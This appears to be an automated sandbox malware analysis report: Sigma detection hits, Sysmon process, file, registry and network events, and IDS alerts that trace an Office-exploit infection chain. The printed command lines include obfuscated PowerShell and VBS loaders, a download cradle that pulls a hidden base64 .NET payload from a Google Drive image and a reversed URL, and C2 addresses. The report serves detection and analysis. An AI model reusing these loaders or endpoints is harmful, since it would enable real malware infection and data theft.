Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'[base64 blob removed]'+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , ProcessId: 3068, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3964, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" , ProcessId: 4040, ProcessName: mshta.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe, ProcessId: 2052, ProcessName: powershell.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , ProcessId: 3068, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", ProcessId: 2756, ProcessName: csc.exe
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 24.199.88.84, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . 
( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . 
( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , ProcessId: 3068, ProcessName: wscript.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3492, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3492, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . 
( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Local\Temp\32orfxa5.xky.ps1

                  Data Obfuscation

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", ProcessId: 2756, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  Source: Registry Key setAuthor: Joe Security: Data: Details: 4E 55 2A 99 40 8F 37 80 24 62 FA EE 12 CB 64 B0 50 17 08 62 6D CB 9C A0 5A 19 81 E7 36 4F F1 85 EC 90 52 74 20 7A 8B 01 7C 2C A8 0C 66 3C 73 53 3E 9B E9 D9 DC AB 40 78 B6 92 F9 A9 CE 71 70 57 F8 B5 E1 8A E4 CC C9 00 42 0B FA 46 55 6B 7F 89 FB BA D2 6F 3F 79 82 94 A6 77 5C A9 39 A9 CC 0B 7A E9 E8 57 B2 4F 90 85 44 6A 5F 2B 8B 1E 9C D8 71 07 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\Software\Rmc-N6HMP4\exepath
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-10-23T17:26:32.377165+0200 | 2024197 | 1 | A Network Trojan was detected | 85.215.206.82 | 80 | 192.168.2.22 | 49169 | TCP
                  2024-10-23T17:26:32.377140+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49169 | 85.215.206.82 | 80 | TCP
                  2024-10-23T17:27:17.066409+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 85.215.206.82 | 80 | 192.168.2.22 | 49173 | TCP
                  2024-10-23T17:27:17.066409+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 85.215.206.82 | 80 | 192.168.2.22 | 49173 | TCP
                  2024-10-23T17:27:21.729864+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 45.90.89.98 | 6498 | TCP
                  2024-10-23T17:27:23.249980+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49175 | 45.90.89.98 | 6498 | TCP
